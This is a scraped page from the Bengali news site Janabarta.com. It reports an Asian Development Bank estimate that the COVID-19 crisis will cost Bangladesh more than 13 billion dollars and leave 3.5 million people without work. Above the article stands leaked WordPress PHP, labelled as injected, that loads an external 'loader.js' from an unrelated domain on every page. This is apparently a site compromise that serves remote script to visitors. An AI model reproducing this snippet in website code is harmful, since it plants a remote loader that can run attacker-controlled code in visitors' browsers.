// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site করোনা সংকটে বাংলাদেশের ক্ষতি হবে ১৩০০ কোটি ডলার: এডিবি - Janabarta.com

করোনা সংকটে বাংলাদেশের ক্ষতি হবে ১৩০০ কোটি ডলার: এডিবি

জনবার্তা ডেস্ক: মরণঘাতী করোনাভাইরাসের কারণে সৃষ্ট মহামারিতে পৃথিবীর সব দেশকেই গুণতে হচ্ছে আর্থিক ক্ষতি। বাংলাদেশও এর ব্যতিক্রম নয়। এই সঙ্কটাপন্ন পরিস্থিতিতে এখানকার ক্ষতির হিসাব বার বার পরিবর্তন করতে হচ্ছে সংশ্লিষ্ট দেশীয় ও আন্তর্জাতিক প্রতিষ্ঠানগুলোকে। তেমনি এশীয় উন্নয়ন ব্যাংকের (এডিবি) সর্বশেষ তথ্য মতে, করোনা সংকটে বাংলাদেশের ক্ষতি হবে এক হাজার ৩০০ কোটি ডলারের বেশি।

এই পরিমাণ অর্থ বাংলাদেশের জিডিপির ৪ দশমিক ৯ শতাংশ। এডিবির প্রতিবেদনে বলা হয়, ভাইরাসের প্রাদুর্ভাব কমাতে সরকার কর্তৃক দেয়া সাধারণ ছুটির কারণে গড়ে ৩৫ লাখ মানুষ কর্মহীন হয়ে পড়বে।

তবে এর আগে মার্চে ব্যাংকটির এক হিসাবে বলা হয়েছিল, করোনার মধ্যেও বাংলাদেশের অর্থনীতি সবল থাকবে। জিডিপি সর্বোচ্চ কমতে পারে ১ দশমিক ১ শতাংশ।

করোনা পরিস্থিতি মোকাবেলায় বাংলাদেশকে ইতোমধ্যে ১০ কোটি ডলার ঋণ সহায়তা দিয়েছে এডিবি।